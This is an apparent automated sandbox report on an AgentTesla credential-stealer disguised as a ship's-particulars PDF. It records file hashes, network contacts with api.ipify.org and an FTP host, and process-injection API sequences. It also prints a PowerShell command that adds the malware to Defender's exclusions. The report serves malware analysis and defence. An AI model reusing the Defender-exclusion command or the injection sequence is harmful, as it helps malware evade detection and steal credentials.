                                                                                                                https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                • 104.26.12.205

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV BBG MUARA Ship's Particulars.pdf.scr.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1216
                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                Malicious:true
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):0.773832331134527
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllulx/:NllU
                                                                                                                MD5:F57B3C748887161F8BB93941BD4BD122
                                                                                                                SHA1:95E5C6DE8FCECC4F1DA4FF59498636E99971AF92
                                                                                                                SHA-256:0723E06FAA4F308175FD8F153940229C06201CE6C82D16075320F26E777C3904
                                                                                                                SHA-512:E11AF9E36F6DF3DAFB703A84757CB511A346BDC433C1A8A3B1907248CC53EC4CB42A3C8B16A42E5D72BBF6A9E942AF4C73C9001A58070E0476AE8B4A0B3291FB
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:@...e.................................L.........................

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11lz2jrg.ahb.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhln2n40.zeh.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.526239595566343
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                File name:MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                                                File size:979'456 bytes
                                                                                                                MD5:1779ee90e122ebe86f1bddc4ec06440d
                                                                                                                SHA1:e8842b83a180e7589e366bd61b08f59a87a71734
                                                                                                                SHA256:941559a78b6e1caf39212048e7f62723e5f283d1942858cc07a339d6d6b24362
                                                                                                                SHA512:a5b84316604b0728cf6cd29409f68a9b4b41b8437bf39ead5bac4ba7806339adeabd848c352a7b90be6bfbf57c709a3a1636ea2f0d655c0cce6b2f95e4c9faaf
                                                                                                                SSDEEP:12288:/csCELA+12Hd5lpvS36pDfi/xN3xIZrzfBVzxWWKy5siBjVE4wPLXkYVx5OjuRZx:0zf/zxWu5zW4wjkTuRZOVFuxztsrG
                                                                                                                TLSH:1825B02077F8DD67E27A61B3EAC8421197B6D146767BE3AA0CD560CE25C27321383D27
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(......^.... ........@.. .......................`............@................................

                                                                                                                File Icon

                                                                                                                Icon Hash:130b253d1931012d

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x4ee65e
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x673E9A8A [Thu Nov 21 02:27:22 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xee60c0x4f.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x2588.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x20000xec6640xec800a725ee12878a504296537ae23b36c3c2False0.73659755714852data7.528323979837935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0xf00000x25880x26000c2ed23f4b73d34a7def91b7ee71a2d0False0.8751027960526315data7.577009356017859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0xf40000xc0x20056d29d29c24a75d76e7ed4e57186142cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0xf01000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                                                                                                RT_GROUP_ICON0xf21280x14data1.05
                                                                                                                RT_VERSION0xf214c0x23cdata0.46853146853146854
                                                                                                                RT_MANIFEST0xf23980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                mscoree.dll_CorExeMain

                                                                                                                Network Behavior

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 21, 2024 13:06:17.435720921 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:17.435758114 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:17.435834885 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:17.601142883 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:17.601165056 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:18.870743990 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:18.870845079 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:18.875483036 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:18.875503063 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:18.875884056 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:18.929224968 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:19.011527061 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:19.059338093 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:19.348870993 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:19.349035025 CET44349735104.26.12.205192.168.2.4
                                                                                                                Nov 21, 2024 13:06:19.349309921 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:19.390930891 CET49735443192.168.2.4104.26.12.205
                                                                                                                Nov 21, 2024 13:06:21.279850960 CET4973621192.168.2.450.87.144.157
                                                                                                                Nov 21, 2024 13:06:21.399930000 CET214973650.87.144.157192.168.2.4
                                                                                                                Nov 21, 2024 13:06:21.400029898 CET4973621192.168.2.450.87.144.157
                                                                                                                Nov 21, 2024 13:06:21.409563065 CET4973621192.168.2.450.87.144.157
                                                                                                                Nov 21, 2024 13:06:21.529881001 CET214973650.87.144.157192.168.2.4
                                                                                                                Nov 21, 2024 13:06:21.529959917 CET4973621192.168.2.450.87.144.157

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 21, 2024 13:06:17.114108086 CET6389353192.168.2.41.1.1.1
                                                                                                                Nov 21, 2024 13:06:17.340250969 CET53638931.1.1.1192.168.2.4
                                                                                                                Nov 21, 2024 13:06:20.755846977 CET5203853192.168.2.41.1.1.1
                                                                                                                Nov 21, 2024 13:06:21.279093027 CET53520381.1.1.1192.168.2.4

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 21, 2024 13:06:17.114108086 CET192.168.2.41.1.1.10x1bcfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 21, 2024 13:06:20.755846977 CET192.168.2.41.1.1.10xe576Standard query (0)beirutrest.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 21, 2024 13:06:17.340250969 CET1.1.1.1192.168.2.40x1bcfNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                Nov 21, 2024 13:06:17.340250969 CET1.1.1.1192.168.2.40x1bcfNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                Nov 21, 2024 13:06:17.340250969 CET1.1.1.1192.168.2.40x1bcfNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                Nov 21, 2024 13:06:21.279093027 CET1.1.1.1192.168.2.40xe576No error (0)beirutrest.com50.87.144.157A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • api.ipify.org

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449735104.26.12.205443796C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-21 12:06:19 UTC155OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-21 12:06:19 UTC399INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 21 Nov 2024 12:06:19 GMT
                                                                                                                Content-Type: text/plain
                                                                                                                Content-Length: 11
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e608d91dda3427c-EWR
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1808049&cwnd=242&unsent_bytes=0&cid=75797b4134375d66&ts=492&x=0"
                                                                                                                2024-11-21 12:06:19 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:07:06:04
                                                                                                                Start date:21/11/2024
                                                                                                                Path:C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                                                                                                                Imagebase:0x30000
                                                                                                                File size:979'456 bytes
                                                                                                                MD5 hash:1779EE90E122EBE86F1BDDC4EC06440D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:07:06:14
                                                                                                                Start date:21/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:07:06:15
                                                                                                                Start date:21/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:07:06:14
                                                                                                                Start date:21/11/2024
                                                                                                                Path:C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                                                                                                                Imagebase:0x970000
                                                                                                                File size:979'456 bytes
                                                                                                                MD5 hash:1779EE90E122EBE86F1BDDC4EC06440D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:10.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:1.3%
                                                                                                                  Total number of Nodes:159
                                                                                                                  Total number of Limit Nodes:11
                                                                                                                  execution_graph 22041 6c9a028 22042 6c9a1b3 22041->22042 22044 6c9a04e 22041->22044 22044->22042 22045 6c95e08 22044->22045 22046 6c9a2a8 PostMessageW 22045->22046 22047 6c9a314 22046->22047 22047->22044 22048 b5d5f0 DuplicateHandle 22049 b5d686 22048->22049 22050 b5ac10 22054 b5acf9 22050->22054 22059 b5ad08 22050->22059 22051 b5ac1f 22055 b5ad3c 22054->22055 22056 b5ad19 22054->22056 22055->22051 22056->22055 22057 b5af40 GetModuleHandleW 22056->22057 22058 b5af6d 22057->22058 22058->22051 22060 b5ad19 22059->22060 22061 b5ad3c 22059->22061 22060->22061 22062 b5af40 GetModuleHandleW 22060->22062 22061->22051 22063 b5af6d 22062->22063 22063->22051 22224 b5cfa0 22225 b5cfe6 GetCurrentProcess 22224->22225 22227 b5d031 22225->22227 22228 b5d038 GetCurrentThread 22225->22228 22227->22228 22229 b5d075 GetCurrentProcess 22228->22229 22230 b5d06e 22228->22230 22231 b5d0ab 22229->22231 22230->22229 22232 b5d0d3 GetCurrentThreadId 22231->22232 22233 b5d104 22232->22233 22064 6c97e80 22069 6c98d6e 22064->22069 22084 6c98d10 22064->22084 22098 6c98d00 22064->22098 22065 6c97e9f 22070 6c98cfc 22069->22070 22071 6c98d71 22069->22071 22112 6c99313 22070->22112 22117 6c99b41 22070->22117 22122 6c993ee 22070->22122 22126 6c991bc 22070->22126 22134 6c997fa 22070->22134 22139 6c9948b 22070->22139 22143 6c992d9 22070->22143 22147 6c994c9 22070->22147 22151 6c99c06 22070->22151 22156 6c99616 22070->22156 22161 6c99af2 22070->22161 22072 6c98d4e 22072->22065 22085 6c98d2a 22084->22085 22087 6c994c9 2 API calls 22085->22087 22088 6c992d9 2 API calls 22085->22088 22089 6c9948b 2 API calls 22085->22089 22090 6c997fa 2 API calls 22085->22090 22091 6c991bc 4 API calls 22085->22091 22092 6c993ee 2 API calls 22085->22092 22093 6c99b41 2 API calls 22085->22093 22094 6c99313 2 API calls 22085->22094 22095 6c99af2 2 API calls 22085->22095 22096 6c99616 2 API calls 22085->22096 22097 6c99c06 2 API calls 22085->22097 22086 6c98d4e 22086->22065 22087->22086 22088->22086 22089->22086 22090->22086 22091->22086 22092->22086 22093->22086 22094->22086 22095->22086 22096->22086 22097->22086 22099 6c98d2a 22098->22099 22101 6c994c9 2 API calls 22099->22101 22102 6c992d9 2 API calls 22099->22102 22103 6c9948b 2 API calls 22099->22103 22104 6c997fa 2 API calls 22099->22104 22105 6c991bc 4 API calls 22099->22105 22106 6c993ee 2 API calls 22099->22106 22107 6c99b41 2 API calls 22099->22107 22108 6c99313 2 API calls 22099->22108 22109 6c99af2 2 API calls 22099->22109 22110 6c99616 2 API calls 22099->22110 22111 6c99c06 2 API calls 22099->22111 22100 6c98d4e 22100->22065 22101->22100 22102->22100 22103->22100 22104->22100 22105->22100 22106->22100 22107->22100 22108->22100 22109->22100 22110->22100 22111->22100 22113 6c99323 22112->22113 22166 6c977b8 22113->22166 22170 6c977b0 22113->22170 22114 6c999fc 22118 6c992c0 22117->22118 22119 6c9915d 22117->22119 22118->22119 22120 6c977b8 WriteProcessMemory 22118->22120 22121 6c977b0 WriteProcessMemory 22118->22121 22119->22072 22120->22118 22121->22118 22124 6c977b8 WriteProcessMemory 22122->22124 22125 6c977b0 WriteProcessMemory 22122->22125 22123 6c99412 22124->22123 22125->22123 22127 6c991cf 22126->22127 22174 6c97a40 22127->22174 22178 6c97a34 22127->22178 22135 6c99800 22134->22135 22182 6c99e5f 22135->22182 22187 6c99e70 22135->22187 22136 6c99c38 22136->22072 22200 6c97618 22139->22200 22204 6c97620 22139->22204 22140 6c994aa 22140->22072 22145 6c97618 Wow64SetThreadContext 22143->22145 22146 6c97620 Wow64SetThreadContext 22143->22146 22144 6c992f3 22144->22072 22145->22144 22146->22144 22208 6c978a8 22147->22208 22212 6c978a0 22147->22212 22148 6c994eb 22148->22072 22152 6c99b0d 22151->22152 22153 6c99c13 22151->22153 22152->22151 22216 6c97138 22152->22216 22220 6c97130 22152->22220 22157 6c992c0 22156->22157 22157->22156 22158 6c9915d 22157->22158 22159 6c977b8 WriteProcessMemory 22157->22159 22160 6c977b0 WriteProcessMemory 22157->22160 22158->22072 22159->22157 22160->22157 22162 6c99b0d 22161->22162 22163 6c99c13 22162->22163 22164 6c97138 ResumeThread 22162->22164 22165 6c97130 ResumeThread 22162->22165 22164->22162 22165->22162 22167 6c97800 WriteProcessMemory 22166->22167 22169 6c97857 22167->22169 22169->22114 22171 6c977b8 WriteProcessMemory 22170->22171 22173 6c97857 22171->22173 22173->22114 22175 6c97ac9 CreateProcessA 22174->22175 22177 6c97c8b 22175->22177 22179 